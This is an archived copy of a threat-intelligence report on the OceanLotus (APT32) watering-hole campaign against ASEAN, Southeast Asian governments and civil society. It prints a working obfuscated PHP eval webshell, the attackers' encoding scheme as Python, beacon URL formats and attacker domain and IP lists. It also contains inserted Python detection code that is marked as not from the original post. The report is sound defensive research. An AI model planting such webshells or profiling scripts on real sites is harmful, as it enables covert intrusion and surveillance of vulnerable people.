{
	"id": "2ed50a9d-3f31-454a-9882-832a96e52d41",
	"created_at": "2026-04-06T00:15:15.409151Z",
	"updated_at": "2026-04-10T13:11:41.895876Z",
	"deleted_at": null,
	"sha1_hash": "3264963acb73ff23add60985ee4d3814b2358a58",
	"title": "OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3234363,
	"plain_text": "OceanLotus Blossoms: Mass Digital Surveillance and Attacks\r\nTargeting ASEAN, Asian Nations, the Media, Human Rights\r\nGroups, and Civil Society\r\nBy mindgrub\r\nPublished: 2017-11-06 · Archived: 2026-04-05 20:46:47 UTC\r\nIn May 2017, Volexity identified and started tracking a very sophisticated and extremely widespread mass digital\r\nsurveillance and attack campaign targeting several Asian nations, the ASEAN organization, and hundreds of\r\nindividuals and organizations tied to media, human rights and civil society causes. These attacks are being\r\nconducted through numerous strategically compromised websites and have occurred over several high-profile\r\nASEAN summits. Volexity has tied this attack campaign to an advanced persistent threat (APT) group first\r\nidentified as OceanLotus by SkyEye Labs in 2015. OceanLotus, also known as APT32, is believed to be a\r\nVietnam-based APT group that has become increasingly sophisticated in its attack tactics, techniques, and\r\nprocedures (TTPs). Volexity works closely with several human rights and civil society organizations. A few of\r\nthese organizations have specifically been targeted by OceanLotus since early 2015. As a result, Volexity has been\r\nable to directly observe and investigate various attack campaigns. 
This report is based on a very targeted attack\r\nthat Volexity observed and the research that followed.\r\nKey highlights of this most recent and ongoing attack campaign by the OceanLotus group are as follows:\r\nMassive digital profiling and information collection campaign via strategically compromised websites\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 1 of 20\n\nOver 100 websites of individuals and organizations tied to Government, Military, Human Rights, Civil Society, Media, State Oil Exploration, and more used to launch attacks around the globe\r\nUse of whitelists to target only specific individuals and organizations\r\nCustom Google Apps designed for gaining access to victim Gmail accounts to steal e-mail and contacts\r\nStrategic and targeted JavaScript delivery to modify the view of compromised websites to facilitate social engineering of visitors to install malware or provide access to e-mail accounts\r\nLarge distributed attack infrastructure spanning numerous hosting providers and countries\r\nNumerous attacker-created domains designed to mimic legitimate online services and organizations such as AddThis, Disqus, Akamai, Baidu, Cloudflare, Facebook, Google, and others\r\nHeavy use of Let’s Encrypt SSL/TLS certificates\r\nUse of multiple backdoors, such as Cobalt Strike and others believed to be developed and solely used by OceanLotus\r\nVolexity believes the size and scale of this attack campaign have only previously been rivaled by a Russian APT\r\ngroup commonly referred to as Turla and documented in a report from Symantec called The Waterbug attack\r\ngroup. The OceanLotus threat group has successfully operated, largely unnoticed, through several high-profile\r\nwebsites since late 2016. 
Volexity has observed the following operating pattern for the OceanLotus group:\r\nCompromise a website of strategic importance (i.e. one whose visitors have a higher likelihood of being targets of interest)\r\nAdd one or more webshell backdoors to the victim website to maintain persistence\r\nUse the webshell to add JavaScript developed by OceanLotus into the website\r\nThe malicious JavaScript makes calls over HTTP or HTTPS to attacker-controlled domains to typically load one of two different OceanLotus frameworks\r\nThe OceanLotus JavaScript frameworks track, profile, and target the compromised website’s visitors\r\nWebsite visitors of interest are flagged for targeting and receive special JavaScript aimed at compromising the user’s system or e-mail accounts\r\nVolexity has also noted that some of the organizations with compromised websites have also been targeted with\r\nspear phishing campaigns that attempt to install backdoors on the target systems. Spear phishing activity and\r\ndetailed malware infrastructure will be described in a follow-on report on OceanLotus activity.\r\nCompromised Sites\r\nVolexity has been able to identify a staggering number of websites that have been strategically\r\ncompromised by the OceanLotus attackers. The number of compromised websites exceeds 100. The\r\noverwhelming majority of the websites that have been compromised belong to Vietnamese individuals and\r\norganizations that are critical of the Vietnamese Government. The remainder of the compromised websites are\r\ntied to one of three countries that share a land border with Vietnam or the Philippines. 
Unlike with the Vietnamese\r\nvictims, in most cases these websites are tied to state-owned or affiliated organizations.\r\nVietnam\r\nVolexity has chosen not to list the Vietnamese websites that have been compromised, as the quantity is\r\nexceedingly large (over 80) and many of them are tied to individuals or very small organizations. However, the list\r\nbelow characterizes the types of websites that have been victimized to facilitate this ongoing campaign.\r\nHuman Rights\r\nCivil Society\r\nNews/Media (English and Vietnamese Language)\r\nIndividual Bloggers\r\nReligion\r\nASEAN\r\nOrganization | Website | Compromised Page\r\nAssociation of Southeast Asian Nations (ASEAN) | asean.org | /modules/aseanmail/js/wp-mailinglist.js; /modules/wordpress-popup/inc/external/wpmu-lib/js/wpmu-ui.3.min.js\r\nASEAN Trade Repository | atr.asean.org | Main Index\r\nASEAN Investment | investasean.asean.org | Main Index\r\nCambodia\r\nOrganization | Website | Compromised Page\r\nMinistry of Foreign Affairs | www.mfa.gov.kh | /jwplayer.js\r\nMinistry of Environment | www.moe.gov.kh | /other/js/jquery/jquery.js\r\nMinistry of Civil Service | www.mcs.gov.kh | Main Index\r\nNational Police | www.police.gov.kh | /wp-includes/js/jquery/jquery.js?ver=1.12.4\r\nMinistry of National Assembly-Senate Relations and Inspection | www.monasri.gov.kh | wtemplates/monasri_template/js/menu/mega.js\r\nMinistry of Social Affairs, Veterans, and Youth Rehabilitation | www.mosvy.gov.kh | /public/js/default.js\r\nNational Election Committee | www.necelect.org.kh | Main Index\r\nChina\r\nOrganization | Website | Compromised Page\r\nBDStar Information Service Co. | bdstarlbs.com | Main Index\r\nBDStar Navigation Co. | www.navchina.com | Main Index\r\nChina National United Oil Corporation | www.chinaoil.com.cn | /chinaoil/xhtml/js/jquery-1.7.2.min.js\r\nChina Oilfield Services Limited | Withheld | Withheld\r\nChina National Offshore Oil Corporation | Withheld | Withheld\r\nLaos\r\nOrganization | Website | Compromised Page\r\nBokeo Province | bokeo.gov.la | Main Index\r\nMinistry of Public Works and Transport | www.mpwt.gov.la | /media/system/js/mootools-core.js\r\nPhilippines\r\nOrganization | Website | Compromised Page\r\nArmed Forces of the Philippines | www.afp.mil.ph | /modules/mod_js_flexslider/assets/js/jquery.easing.js\r\nOffice of the President | op-proper.gov.ph | Main Index\r\nJavaScript Tracking, Profiling, and Delivery Frameworks\r\nThe compromised websites are being leveraged to deliver malicious JavaScript designed to profile and fingerprint\r\na user on each visit. Volexity found that OceanLotus had developed two different JavaScript frameworks to\r\naccomplish their profiling and targeting activities. For the purposes of this blog, we will call them Framework A\r\nand Framework B. With few exceptions, the compromised websites would only have code loading either\r\nFramework A or Framework B. Each of the hostnames and IPs was also tied to one of the two frameworks, with\r\nnone of them serving up both. The following sections will provide some detail on the two frameworks and their\r\nmultiple scripting components.\r\nFramework A\r\nFramework A is found on a limited number of victim sites. 
Initial URLs for access to Framework A are typically\r\nformatted similarly to the following:\r\ncloudflare-api[.]com/ajax/libs/jquery/2.1.3/jquery.min.js?s=1\u0026v=72580\r\nVolexity believes the v= value is unique and serves as a victim site identifier, which may not be necessary given\r\nthe data the script sends along as detailed below. The above script is retrieved following a visit to asean.org. The\r\nfollowing code has been appended to legitimate JavaScript loaded by the ASEAN website:\r\nFramework A, Script 1 – Host Tracking\r\nThe first script delivered contains several support functions such as an MD5 function, a base64 decoder, and\r\nfunctions for loading additional data. The goal of this script appears to be defining everything needed to track a\r\nhost across different requests.\r\nThis script defines a section of variables used in other parts of the code. The host-based ones are obtained from the\r\nUser-Agent in the initial request.\r\nThen it will load a second JavaScript file:\r\nThe h1 and h2 values in the request are MD5 hashes of some information about the host making the request. The\r\nfirst hash, h1, is the MD5 hash of various pieces of information collected from the browser and concatenated\r\ntogether.\r\nThe second hash, h2, is also an MD5 hash, but the values concatenated are the screen height and width, timezone,\r\nplugins, MIME type, and language information.\r\nThe encrypt function simply iterates over the passed string and key string and adds the ASCII values at each\r\nposition. 
Python scripts for encrypting and decrypting are as follows (ported to Python 3 from the Python 2 originals; the key indexing is unchanged).\r\nEncrypt:\r\n#!/usr/bin/env python3\r\n# Usage: encrypt.py KEY PLAINTEXT\r\nimport base64\r\nimport sys\r\n\r\nkey = sys.argv[1].encode()\r\n# The plaintext is base64-encoded first...\r\nb64_data = base64.b64encode(sys.argv[2].encode())\r\n# ...then the key byte for each position is added to it. The -1 is kept from the\r\n# original script: position 0 is combined with the last key byte.\r\nenc_data = bytes(x + key[i % len(key) - 1] for i, x in enumerate(b64_data))\r\nprint(base64.b64encode(enc_data).decode())\r\nDecrypt:\r\n#!/usr/bin/env python3\r\n# Usage: decrypt.py KEY CIPHERTEXT_BASE64\r\nimport base64\r\nimport sys\r\n\r\nkey = sys.argv[1].encode()\r\nenc_data = base64.b64decode(sys.argv[2])\r\n# Subtract the same key byte at each position to recover the base64 layer...\r\ndec_data = bytes(x - key[i % len(key) - 1] for i, x in enumerate(enc_data))\r\n# ...then undo the inner base64 encoding.\r\nprint(base64.b64decode(dec_data).decode())\r\nFramework A, Script 2 – Profiling\r\nThe second script returned starts by defining a browser_hash variable. This is composed of h1 and the first 10\r\ncharacters of h2, separated by “–“. This script then sends three GET requests, each with a d parameter in the query\r\nstring that contains some encrypted and base64-encoded data.\r\nOne request sends “Browser Plugins.” The info is collected in the following part of the code:\r\nAnother request sends “Extended Browser Info.” This info is collected as follows:\r\nThe final request sends “WebRTC” info to obtain the host IP address.\r\nFramework B\r\nFramework B is found on the vast majority of sites. Initial URLs for access to Framework B are simply references\r\nto JavaScript (.js) files on OceanLotus-controlled sites. 
Volexity has found that the URLs from Framework B do\r\nnot actually matter, so long as the file extension ends in .js and a Referer header is sent with the request. The JavaScript\r\nwill be sent back regardless of the file or folder requested as long as it meets these two criteria.\r\nThe main ASEAN website is one of the few places that contain both Framework A and Framework B.\r\nThe following code has also been appended to legitimate JavaScript loaded by the ASEAN website:\r\nThis script will result in the loading of JavaScript from the following URL:\r\nhttp://ad.jqueryclick[.]com/assets/adv.js\r\nFramework B, Script 1 – Host Tracking\r\nThe second framework collects similar information, but handles host tracking differently. The initial script that is\r\ndelivered varies based on the host OS as determined from the User-Agent in the request. When the script is\r\nloaded, it first makes a GET request to https://health-ray-id[.]com/robot.txt. This returns a UUID that is sent in\r\nsubsequent requests as either zuuid or client_zuuid. It is also saved in localStorage for the compromised site\r\nunder a key of x00Sync. The script then makes two GET requests.\r\nRequest 1:\r\nGET /api/\u003cBASE64_ENCODED_DATA\u003e/adFeedback.js\r\nThe base64 data decodes to a JSON string containing information for tracking the host. In the (truncated) example\r\nbelow, zuuid is the UUID returned from health-ray-id.com:\r\n{\"uuid\":\"62d096b35e82547b6a12607c2820f8e0\",\"zuuid\":\"ca3a8d02-a0f5-4686-9f6b-cab4a17a9e2b\",\"\r\nThe uuid value (also seen as client_uuid in later requests) is also generated by the script and is stored in a cookie\r\nnamed ___APISID for the compromised domain. It is generated using the fingerprintjs2 library, which creates a\r\nhash based on browser information. 
This is another method for tracking users across requests. This library and\r\nseveral other legitimate JavaScript libraries (including the jQuery core library and others for reading/storing\r\ncookies, collecting timezone data, etc.) are typically downloaded from a CDN URL and saved into localStorage\r\nvariables to be later used by the script. They are stored as hex-encoded data in a function called x00Config.\r\nIf the client is not on the OceanLotus whitelist, this request just returns a single line of JavaScript setting a\r\nvariable named timestamp. However, when the client is on the whitelist, Volexity has observed a popup window\r\nthat slowly fades in on top of the legitimate website. In a recent attack, the popup appeared Google-related and\r\nwould redirect to a Google OAuth page designed to fool the user into providing access to their account to a\r\nmalicious Google App. More details on this appear further down in this post.\r\nRequest 2:\r\nGET /sync/\u003cBASE64_ENCODED_DATA\u003e/img_blank.gif\r\nThis request contains two pieces of information: a history section and a navigator section. The history section\r\ncontains information about the compromised site that the JavaScript was loaded from. It also contains certain\r\ninformation about the host including the User-Agent, time and timezone, and IP addresses.\r\nThe navigator section is blank the first time the request is made. When the script is first run, it records the current\r\ntime in another localStorage variable. It only populates the navigator section if 24 hours have passed. It will also\r\nupdate the stored timestamp. This means the large section of data in the navigator section is only sent once per\r\nday, even if this compromised site is visited multiple times. This section includes a lot of the same information\r\ncollected by Framework A, including MIME Types, plugins, and screen information. 
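Triage of the Framework B beacons from a proxy log, as an added example; this is not code from the original post and not the OceanLotus script itself. It recognises the two request shapes described above (Request 1, /api/BASE64/adFeedback.js, and Request 2, /sync/BASE64/img_blank.gif) together with the connect.js?timestamp= config fetch the post describes further down, decodes the base64 JSON segment and groups the uuid/zuuid tracking identifiers per client, so an analyst can see which hosts were profiled and how often. The log line format, the client address and the hostnames in the sample are constructed; the uuid and zuuid values are the ones quoted above.

```python
import base64
import json
import re

# The two Framework B beacon paths described above, plus the connect.js
# config fetch described further down. The middle segment is base64.
BEACON = re.compile('^/(api|sync)/([A-Za-z0-9+/=_-]+)/(adFeedback[.]js|img_blank[.]gif)$')
CONNECT = re.compile('^/connect[.]js[?]timestamp=')


def decode_segment(segment):
    # Pad the segment (copies taken from logs often lose the trailing =) and
    # try the standard then the URL-safe alphabet. Returns parsed JSON or None.
    padded = segment + '=' * (-len(segment) % 4)
    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            return json.loads(decoder(padded).decode())
        except ValueError:
            continue
    return None


def parse_request(path):
    # Classify one request path as ('track', payload), ('sync', payload),
    # ('connect', {}) or None when it is not a Framework B request.
    m = BEACON.match(path)
    if m:
        payload = decode_segment(m.group(2))
        if isinstance(payload, dict):
            return ('track' if m.group(1) == 'api' else 'sync', payload)
        return None
    if CONNECT.match(path):
        return ('connect', {})
    return None


def path_of(url):
    # Reduce an absolute URL, as proxies log it, to its path and query.
    if '://' in url:
        rest = url.split('://', 1)[1]
        return rest[rest.find('/'):] if '/' in rest else '/'
    return url


def trackers_by_client(log_lines):
    # Constructed line format: timestamp client_ip method url status.
    # Returns {client_ip: {'uuid': ..., 'zuuid': ..., 'hits': n}} for every
    # client that issued at least one Framework B request.
    result = {}
    for line in log_lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        client, url = parts[1], parts[3]
        parsed = parse_request(path_of(url))
        if parsed is None:
            continue
        kind, payload = parsed
        entry = result.setdefault(client, {'uuid': None, 'zuuid': None, 'hits': 0})
        entry['hits'] += 1
        # The script sends the same identifiers as uuid/zuuid in one request
        # and as client_uuid/client_zuuid in another; record either spelling.
        for key in ('uuid', 'zuuid'):
            value = payload.get(key) or payload.get('client_' + key)
            if value:
                entry[key] = value
    return result


def make_segment(obj):
    # Build a beacon segment the way the script does: compact JSON, base64.
    return base64.b64encode(json.dumps(obj, separators=(',', ':')).encode()).decode()


# Constructed proxy log. The uuid/zuuid values are the ones quoted above; the
# timestamps, client addresses and hostnames are invented placeholders.
UUID = '62d096b35e82547b6a12607c2820f8e0'
ZUUID = 'ca3a8d02-a0f5-4686-9f6b-cab4a17a9e2b'
SAMPLE_LOG = [
    '2017-11-06T08:15:02Z 10.1.2.3 GET http://tracker.example/api/'
    + make_segment({'uuid': UUID, 'zuuid': ZUUID}) + '/adFeedback.js 200',
    '2017-11-06T08:15:03Z 10.1.2.3 GET http://tracker.example/sync/'
    + make_segment({'client_uuid': UUID, 'client_zuuid': ZUUID,
                    'history': {'url': 'http://asean.org/'}, 'navigator': {}})
    + '/img_blank.gif 200',
    '2017-11-06T08:15:09Z 10.1.2.3 GET http://tracker.example/connect.js?timestamp=59ba12f2eb1e240cd9431624&code=rtp 200',
    '2017-11-06T08:16:00Z 10.1.2.4 GET http://cdn.example/jquery.min.js 200',
]

if __name__ == '__main__':
    for client, info in trackers_by_client(SAMPLE_LOG).items():
        print(client, info)
```

Run it as a script to print the per-client summary, or call trackers_by_client() on real proxy lines after adapting the column positions in the split. Any client in the result was profiled by Framework B; whether it also received the whitelisted popup is not visible at this layer, because what differs for a whitelisted host is the body of the adFeedback.js response, not the request.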
Below are a few portions of\r\nthe data collected and sent back to the OceanLotus servers.\r\nFramework B, Script 2 – Popup for Whitelisted Systems\r\nAs mentioned above, if a system is not on the whitelist, the GET\r\n/api/\u003cBASE64_ENCODED_DATA\u003e/adFeedback.js request will just return a timestamp variable. For a\r\nwhitelisted system, a new script is delivered. A portion of this script shown below makes a request to download\r\nsome additional config data.\r\nThe domain for the request is loaded from the SAPIS_ID cookie which was set by the first script. Before storing,\r\nit is split in two, the two substrings are reversed, then it is base64-encoded. An example of the SAPIS_ID cookie\r\ncan be seen in the navigator section above. This ultimately calls the e.fn_getjson() function that makes a request\r\nlike the following:\r\nGET /connect.js?timestamp=59ba12f2eb1e240cd9431624\u0026code=rtp\u0026s1=64c6e32b951adc4f3d5661dba2330141\r\nThis returns a JSON config like the following:\r\nThese are saved and accessed via a getConfigs() function for different actions the script can perform.\r\nUltimately, the script presents a popup over the site saying the content is blocked and requests that the visitor sign\r\nin to continue. The code below presents this page and tracks progress using the postShow() and postDown()\r\nfunctions, which send GET requests using the URLs shown above. 
When one of the buttons is clicked, the user is\r\nredirected to log in to the application.\r\nWhitelisted Targeting for Google Account Access\r\nVolexity was able to work with organizations on the OceanLotus whitelist that received special responses from\r\nFramework B. As a result, Volexity was able to directly observe two different OceanLotus attacks that attempted\r\nto fool the targeted user into providing access to their Google Accounts. OceanLotus attempts to compromise\r\nGoogle Accounts by prompting the user with a popup directing them to provide OAuth authorizations to a\r\nmalicious Google App.\r\nOnce a user has been flagged for targeting, they will receive a popup when accessing an OceanLotus-compromised\r\nwebsite once every 24 hours. This popup slowly fades in over top of the legitimate website and\r\nappears quite legitimate. Screenshots of two different observed popups are shown below.\r\nVersion 1: Locked Content\r\nVersion 2: Chrome Sign In\r\nRegardless of which option the user clicks, they are redirected to Google to initiate OAuth access to one of\r\nOceanLotus’ Google Apps. Below is a screenshot of what a user would see prior to authorizing the nefarious\r\nGoogle App.\r\nOceanLotus Google App OAuth\r\nIf the targeted user chooses ALLOW, the OceanLotus Google App immediately logs into the account and starts\r\naccessing it. 
The App is granted permission to access all e-mail and contacts, which is all the access OceanLotus\r\nneeds to conduct digital surveillance. Volexity strongly recommends that anyone who thinks they may have been\r\ntargeted with this campaign or similar attacks review the Defending Against OceanLotus section below.\r\nOceanLotus is also known to be distributing malware in the form of fake Internet Explorer, Chrome, and Firefox\r\nupdates. Volexity has observed similar attacks via spear phishing against targeted organizations that leverage some\r\nof the same malware infrastructure. In these cases, the following Amazon S3 buckets were used to distribute the\r\nmalware through JavaScript as part of OceanLotus Framework B or direct links from spear phishing campaigns.\r\ndload01.s3.amazonaws.com\r\ndownload-attachments.s3.amazonaws.com\r\nVolexity has observed multiple custom malware families and Cobalt Strike delivered through these campaigns.\r\nDetails on the observed malware samples are forthcoming.\r\nVictim Websites Backdoored\r\nVolexity has worked with multiple victim organizations to assist with incident response efforts and to remedy their\r\ncompromised systems. This process led to the identification of different ways the OceanLotus group gains access\r\nto the compromised websites and how they maintain access.\r\nInitial Compromise\r\nVolexity has observed OceanLotus compromising sites in one of two ways:\r\n1. Direct user account access to the website’s content management system (CMS)\r\n2. Exploitation of outdated plugins and/or CMS components\r\nIt is currently unknown how the intruders gain working credentials to the victim websites. 
Based on the TTPs\r\nleveraged by OceanLotus, it is possible that credentials could have been socially engineered (phished) from the\r\nvictims or that the administrators’ systems have been backdoored and a keylogger has assisted in capturing the login\r\ncredentials. Alternatively, it is possible that some of the credentials were simply guessed. Several of the\r\nVietnamese websites are running on Google’s Blogspot platform, so it is reasonable to believe that those users’\r\nGoogle accounts may be compromised. In the case of exploitation, the CMS software used by the victim\r\norganizations was often woefully out of date. Both the core components and added plugins had remotely\r\nexploitable vulnerabilities that led to compromise.\r\nPersistent Access\r\nIn all examined cases, OceanLotus attackers added PHP webshells to the victim websites. In most cases, the\r\nintruders added a new file that was designed to blend in with the web directory in which it was placed. In some\r\ncases, Volexity observed OceanLotus adding PHP code to an existing legitimate file already on the webserver.\r\nif(@$_POST['\u003cvariable-1\u003e']\u0026\u0026@md5(md5($_POST['\u003cvariable-2\u003e']))=='\u003cmd5 hash\u003e') {\r\n$x=\"\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\";@eval($x($_POST['\u003cvariable-1\u003e']));exit();\r\n}\r\nThe hex-escaped string stored in $x decodes to base64_decode. This code checks to see if variable-1 is set and then\r\nvalidates whether the MD5 of the MD5 of the value set for variable-2 matches an expected MD5 hash. If these\r\nboth evaluate as true, the contents of variable-1 are base64-decoded and evaluated as PHP on the system. The @ operators\r\nsuppress PHP notices, so probes with missing or wrong parameters leave nothing in the error log. This is a simple\r\nwebshell that, similar to a China Chopper shell, allows direct execution on the system under the privileges of the\r\naccount running the webserver. 
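One way to hunt for shells of this shape across a web root, as an added example (not code from the original post or from Volexity): it decodes PHP hex escapes, then looks for the traits of the shell quoted above, namely a function name that only appears after decoding, eval() applied to request data, and the md5(md5()) password gate. The sample files are constructed; the parameter names k1 and k2, the hash value and the benign upload handler are invented.

```python
import re

# Characters the patterns need, by code point: backslash, double quote,
# single quote, newline.
BS, DQ, SQ, NL = chr(92), chr(34), chr(39), chr(10)

# PHP double-quoted strings accept hex escapes (a backslash, x and two hex
# digits) that keep a function name out of plain string searches; this
# finds each escape so it can be decoded.
HEX_ESCAPE = re.compile(BS + BS + 'x([0-9a-fA-F]{2})')

# Names worth flagging when they appear only after the escapes are decoded.
DANGEROUS = ('base64_decode', 'gzinflate', 'str_rot13', 'assert',
             'system', 'passthru', 'shell_exec', 'exec')

EVAL_OF_REQUEST = re.compile('@?eval *[(].*[$]_(POST|REQUEST|GET|COOKIE) *[[]', re.I)
DOUBLE_MD5 = re.compile('md5 *[(] *md5 *[(]', re.I)


def unescape_php_hex(src):
    # Turn every hex escape back into the character it stands for.
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)


def scan_php(src):
    # Returns (line_number, trait) pairs for the traits of the shell quoted
    # above; an empty list means none of them was seen.
    findings = []
    for lineno, raw in enumerate(src.split(NL), start=1):
        decoded = unescape_php_hex(raw)
        if len(HEX_ESCAPE.findall(raw)) >= 8:
            findings.append((lineno, 'long hex-escaped string'))
        for name in DANGEROUS:
            if name in decoded.lower() and name not in raw.lower():
                findings.append((lineno, 'hex-escaped call to ' + name))
        if EVAL_OF_REQUEST.search(decoded):
            findings.append((lineno, 'eval() over request data'))
        if DOUBLE_MD5.search(decoded):
            findings.append((lineno, 'md5(md5()) password gate'))
    return findings


def is_webshell(src):
    # eval() reached from request data has no legitimate use, so it is
    # sufficient on its own; the other traits say which variant it is.
    return any(trait == 'eval() over request data' for _, trait in scan_php(src))


def php_hex(text):
    # Hide text the way the shell above hides base64_decode: one escape per byte.
    return ''.join(BS + 'x%02x' % b for b in text.encode())


def q(text):
    # Wrap text in PHP single quotes.
    return SQ + text + SQ


# Constructed sample in the shape of the shell quoted above. The parameter
# names k1 and k2 and the 32-hex-digit hash are invented.
SAMPLE_SHELL = NL.join([
    '<?php',
    'if(@$_POST[' + q('k1') + ']&&@md5(md5($_POST[' + q('k2') + ']))=='
    + q('0123456789abcdef0123456789abcdef') + ') {',
    '$x=' + DQ + php_hex('base64_decode') + DQ
    + ';@eval($x($_POST[' + q('k1') + ']));exit();',
    '}',
])

# Constructed benign file: decodes POST data but never evaluates it.
SAMPLE_BENIGN = NL.join([
    '<?php',
    '$payload = base64_decode($_POST[' + q('data') + ']);',
    'file_put_contents(' + q('/tmp/upload.bin') + ', $payload);',
])

if __name__ == '__main__':
    for label, src in (('shell', SAMPLE_SHELL), ('benign', SAMPLE_BENIGN)):
        print(label, is_webshell(src), scan_php(src))
```

Run scan_php() over the contents of every .php file under the web root and review the findings line by line; the hex-escape and md5(md5()) traits on their own are suspicious but not conclusive, which is why only eval() over request data decides is_webshell(). Since the post notes that OceanLotus periodically checks that its shells are still present, repeated requests in the access log for the path of a file you have already removed are themselves worth a look.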
The OceanLotus intruders use these shells to interact with the system and update\r\ntheir JavaScript code on the various websites.\r\nOceanLotus also appears to have a potentially automated process that periodically checks if the webshells are still\r\npresent on the victim systems.\r\nCampaign Infrastructure\r\nVolexity has identified a vast and sprawling amount of infrastructure leveraged by OceanLotus as a part of this\r\nstrategic web compromise campaign. There are even more indicators associated with various malware campaigns\r\nthat Volexity will detail in another OceanLotus post to follow. OceanLotus’s attack infrastructure has several\r\nunique characteristics, which makes it easy to identify if a particular system is under their control. As a result,\r\nVolexity was able to identify numerous systems that were not directly observed in active attacks but are strongly\r\nbelieved to be tied to OceanLotus. In the sections below, the infrastructure has been separated into active and\r\ninactive/unknown categories. If the infrastructure is listed as active, this means that Volexity has directly\r\nobserved the hostname’s use in an attack. 
If the infrastructure is listed as inactive/unknown, this means that\r\nVolexity found evidence the hostname was used in a past attack but is no longer in use or it has never been\r\nobserved in a direct attack but has unique characteristics indicative of OceanLotus infrastructure.\r\nActive\r\nHostname | IPv4 Address | IPv6 Address\r\na.doulbeclick.org | 45.76.147.201 | 2001:19f0:4400:48ea:5400:ff:fe71:3201\r\nad.adthis.org | 45.77.39.101 | 2001:19f0:4400:48fd:5400:ff:fe71:3202\r\nad.jqueryclick.com | 64.62.174.146 | N/A\r\napi.querycore.com | 64.62.174.41 | N/A\r\nbrowser-extension.jdfkmiabjpfjacifcmihfdjhpnjpiick.com | 79.143.87.174 | N/A\r\ncdn-js.com | 128.199.227.80 | N/A\r\ncdn.adsfly.co | 45.32.100.179 | 2001:19f0:4400:4798:5400:ff:fe71:3200\r\ncdn.disqusapi.com | 45.76.179.28 | 2001:19f0:4400:4989:5400:ff:fe71:3204\r\ncloudflare-api.com | 45.32.105.45 | N/A\r\ncory.ns.webjzcnd.com | 139.59.223.191 | N/A\r\ngooglescripts.com | 45.114.117.164 | N/A\r\nhealth-ray-id.com | 138.197.236.215 | 2604:a880:2:d0::378c:e001\r\nhit.asmung.net | 45.32.114.49 | N/A\r\njquery.google-script.org | 45.32.105.45 | N/A\r\njs.ecommer.org | 45.76.179.151 | 2001:19f0:4400:48fd:5400:ff:fe71:3202\r\ns.jscore-group.com | 64.62.174.17 | N/A\r\ns1.gridsumcontent.com | 103.28.44.112 | N/A\r\ns1.jqueryclick.com | 64.62.174.145 | N/A\r\nssl.security.akamaihd-d.com | 37.59.198.131 | N/A\r\nstat.cdnanalytic.com | 203.114.75.22 | N/A\r\nstats.widgetapi.com | 64.62.174.99 | N/A\r\ntrack-google.com | 203.114.75.73 | N/A\r\nupdate.security.akamaihd-d.com | 89.33.64.207 | N/A\r\nupdate.webfontupdate.com | 188.166.219.18 | 2400:6180:0:d0::4315:d001\r\nwiget.adsfly.co | 45.32.100.179 | 2001:19f0:4400:4798:5400:ff:fe71:3200\r\nwww.googleuserscontent.org | 139.59.217.207 | 2400:6180:0:d0::4315:7001\r\nInactive/Unknown Status\r\nVolexity was able to identify a substantial amount of infrastructure that belongs to OceanLotus that is 
set up in a\r\nmanner consistent with the above hostnames. However, Volexity has not directly observed attacks leveraging these\r\nhostnames.\r\nHostname | IPv4 Address | IPv6 Address\r\nad.linksys-analytic.com | 64.62.174.16 | N/A\r\nads.alternativeads.net | 45.77.39.101 | 2001:19f0:4400:48fd:5400:ff:fe71:3202\r\napi.2nd-weibo.com | 64.62.174.146 | N/A\r\napi.analyticsearch.org | 64.62.174.41 | N/A\r\napi.baiduusercontent.com | 79.143.87.174 | N/A\r\napi.disquscore.com | 128.199.227.80 | N/A\r\napi.fbconnect.net* | sinkholed | N/A\r\ncache.akamaihd-d.com | 89.33.64.232 | N/A\r\ncloud.corewidget.com | 139.59.217.207 | 2400:6180:0:d0::4315:7001\r\ncore.alternativeads.net | 139.59.220.12 | 2400:6180:0:d0::4315:9001\r\nd3.advertisingbaidu.com | 139.59.223.191 | N/A\r\neclick.analyticsearch.org | 64.62.174.21 | N/A\r\ngoogle-js.net | 45.32.105.45 | N/A\r\ngoogle-js.org | 45.32.105.45 | N/A\r\ngoogle-script.net | 45.32.105.45 | N/A\r\ngs.baidustats.com | 103.28.44.115 | N/A\r\nlinked.livestreamanalytic.com | 139.59.220.10 | 2400:6180:0:d0::4315:8001\r\nlinksys-analytic.com | 64.62.174.17 | N/A\r\nlive.webfontupdate.com | 188.166.219.18 | 2400:6180:0:d0::4315:d001\r\nstatic.livestreamanalytic.com | 139.59.220.10 | 2400:6180:0:d0::4315:8001\r\nstats.corewidget.com | 139.59.217.207 | 2400:6180:0:d0::4315:7001\r\nupdate.akamaihd-d.com | 37.59.198.130 | N/A\r\nupdate.webfontupdate.com | 188.166.219.18 | 2400:6180:0:d0::4315:d001\r\nupgrade.liveupdateplugins.com | 128.199.90.216 | 2400:6180:0:d0::4315:c001\r\nwidget.jscore-group.com | 64.62.174.9 | N/A\r\nDefending Against OceanLotus\r\nWhile the described attack campaign relies on fooling a user, the popups on the websites are quite convincing and\r\nlegitimate-looking. As a result, Volexity would recommend immediately putting in blocks or sinkholes for the\r\ndomains and IP addresses listed above to prevent profiling and possible exploitation. 
The observed attacks thus far\r\nhave relied on social engineering campaigns; however, it would be trivial for OceanLotus to introduce an exploit\r\ninto this chain. As for malware indicators, Volexity will be providing additional data related to malware and\r\nbackdoor infrastructure in a future write-up to follow soon.\r\nWhen it comes to Google accounts, Volexity would recommend that users enable 2-Step Verification. This\r\nis an effective way to prevent access to a Google account should the password be compromised. However, in the\r\ncase of this OceanLotus campaign, the attackers are leveraging a Google App that has OAuth-authorized access to\r\nthe victim’s e-mail and contacts. This effectively bypasses 2-Step Verification: the grant is made from a session the\r\nvictim has already signed into, and the resulting token lets the App read mail without the attackers ever needing the\r\npassword or a second factor. Users should be very\r\ncareful to only authorize legitimate and known Google Apps. Users can verify what Google Apps have access to\r\ntheir account by visiting the following URL:\r\nhttps://myaccount.google.com/u/1/permissions\r\n(The /u/1/ segment selects the second account signed into the browser; https://myaccount.google.com/permissions shows the current one.)\r\nThis will list the Google Apps with access to the account along with their permission levels. 
